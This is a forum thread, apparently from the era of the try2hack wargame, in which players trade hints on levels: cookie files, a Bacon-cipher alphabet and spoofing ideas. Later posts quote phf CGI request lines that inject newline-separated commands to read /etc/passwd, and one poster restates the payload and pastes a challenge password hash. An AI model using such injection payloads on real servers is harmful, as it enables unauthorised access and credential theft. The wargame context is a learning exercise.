|
lurn 2 hAAAAACK (pg. 7)
|
View this Thread in Original format
| Acid Junkie |
hehe... the algorithm is a bit tricky :tongue3 took me a while to get it. anyway, i think level seven can be done if u have unix/linux and an ip spoofer, but i don't know how to use a spoofer... so i decideed to go to bed now, i'm tired already :crazy:
happy hacking :D |
|
|
| sym |
| I still cant find the cookie file for level 4 :( |
|
|
| TiestoInTheMix |
| quote: | Originally posted by Acid Junkie
hehe... the algorithm is a bit tricky :tongue3 took me a while to get it.
happy hacking :D |
there's no way in hell you could've gotten that all by yourself... i mean, c'mon, it uses two double letter assignments and that messes up the whole binary table structure... twice! ;)
as for level 7... i was gonna cry, but then i thought of an idea.
we don't need all that stuff. besides, IE 6.72 doesn't exist. we can fake a request for the script and send it erroneous information. that's not simply intercepting packets, it's FAKING them! the problem is that thinking of a way to do it is half the problem... you gotta find a proggie to do it too... or write one yourself... *shrugs*
sym: mine was called level4[1].txt and it was in the "temporary internet files" directory
arghhh, it's 3 am, wtf am i doing up so late??? |
|
|
| TiestoInTheMix |
blah... anyone know how to compile lynx???
i'm leaving, i'm leaving... |
|
|
| DJ_Ballistic |
| the stupid lvl 6 page won't come up:whip: :whip: :whip: |
|
|
| TiestoInTheMix |
| quote: | Originally posted by DJ_Ballistic
the stupid lvl 6 page won't come up:whip: :whip: :whip: |
change the site adress. it's not try2hack.f2s.com, but rather try2hack.nl |
|
|
| Acid Junkie |
| quote: | Originally posted by TiestoInTheMix
there's no way in hell you could've gotten that all by yourself... i mean, c'mon, it uses two double letter assignments and that messes up the whole binary table structure... twice! ;)
|
hehe, it was easier than that (at least for me). if u were familiar with steganography and knew the history of cryptography, after looking at the sequence for a while, u would have recognized the algorithm of francis bacon. i said that it took me some time to decrypt it because i couldn't remember where i saw that before. but it sure looked similar to something. and then i remembered: i read about a stegano-algorithm that made the phrase all is well with me today (and basically any other phrase that has the number of letters divisible by 5) look like HELP after decoding. an english man invented it and it consisted of exactly the same sequences. that's when i remembered of sir bacon. i then found his made-up alphabet in my book. here it is
A = aaaaa
B = aaaab
C = aaaba
D = aaabb
E = aabaa
F = aabab
G = aabba
H = aabbb
I/J = abaaa
K = abaab
L = ababa
M = ababb
N = abbaa
O = abbab
Q = abbbb
P = abbba
R = baaaa
S = baaab
T = baaba
U/V = baabb
W = babaa
X = babab
Y = babba
Z = babbb
u know the rest :happy2: |
|
|
| TiestoInTheMix |
Whooo-hoooo!!!!!!!!
i beat level 7!!!!!!!!!!!!
methinks he is getting obsessed |
|
|
| Acid Junkie |
| i'm there too. but what do u do now? playing withe the url maybe? not sure. yet :clown: |
|
|
| Acid Junkie |
GET /cgi-bin/phf?QAlias=x%20/etc/ls%20/etc HTTP/1.0" 404 -
GET /cgi-bin/phf?Jserver=a&Qalias=a%0Aid HTTP/1.0" 500 -
GET /cgi-bin/phf?Jserver=a&Qalias=a%0Acat%20/etc/passwd HTTP/1.0" 500 -
GET /cgi-bin/phf?Qalias=%0a/bin/cat%20/etc/passwd HTTP/1.0" 500 -
GET /cgi-bin/phf?Qalias=%0a/bin/cat%20/etc/passwd HTTP/1.0" 500 -
GET /cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 500 -
GET /cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 500 -
that looks like the answer for getting the password :)
|
|
|
| Acid Junkie |
watch this, suckahs!!!!!
tell me who's your daddy now?!?!?!?!?
straight to level 9 !
|
|
|
| TiestoInTheMix |
| quote: | Originally posted by Acid Junkie
watch this, suckahs!!!!!
tell me who's your daddy now?!?!?!?!?
straight to level 9 !
|
freaking forums... didn't post my reply... now i have to do it all over again...
i can't believe you brute force'd it! i'm speechless....
but the phf script is so stupid because it's a famous exploit... you just do ?Qalias=x%0a/bin/cat%20/etc/passwd to it and it gives you the password file... BuiZe:Bu3kOx4cCMX2U
just gotta decrypt it... i don't know what i can do about it, but i'll try tomorrow caz it's too late... |
|
|
|
|
